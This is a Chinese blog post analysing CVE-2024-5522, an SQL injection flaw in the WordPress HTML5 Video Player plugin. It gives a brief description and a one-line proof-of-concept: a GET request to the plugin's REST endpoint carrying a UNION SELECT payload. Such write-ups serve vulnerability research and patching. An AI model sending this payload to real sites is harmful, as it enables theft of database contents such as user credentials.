CVE-2024-5522 WordPress HTML5 Video Player SQLi 漏洞分析利用

2024-8-2

介绍

WordPress插件HTML5 Video Player的SQL注入漏洞,即CVE-2024-5522。该漏洞允许攻击者通过特制的SQL查询,获取或篡改数据库中的敏感信息。我们将探讨该漏洞的原理、影响范围以及利用方式,并提供相应的修复建议。

漏洞概述

漏洞编号:CVE-2024-5522

插件名称:HTML5 Video Player

漏洞类型:SQL注入(SQLi)

影响版本:HTML5 Video Player <= 2.9.1CVSS评分:8.8(高)

漏洞描述

SQL注入漏洞的存在是由于插件未能正确过滤和转义用户输入的数据,直接将其嵌入到SQL查询中执行。通过精心构造的恶意输入,攻击者可以绕过身份验证并执行任意SQL命令,从而访问数据库中的敏感信息,例如用户凭证、电子邮件地址等。

漏洞利用

PoC (Proof of Concept)

GET  /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -

 

阅读剩余
版权声明:
作者:YiRan
链接:https://www.3css.cn/41.html
文章版权归作者所有,未经允许请勿转载。
THE END
Wordpress安全安全漏洞插件安全渗透
WP常用函数手册
下一篇>>
相关推荐
CVE-2024-5522 WordPress HTML5 Video Player SQLi 漏洞分析利用
首页
发布
分类
我的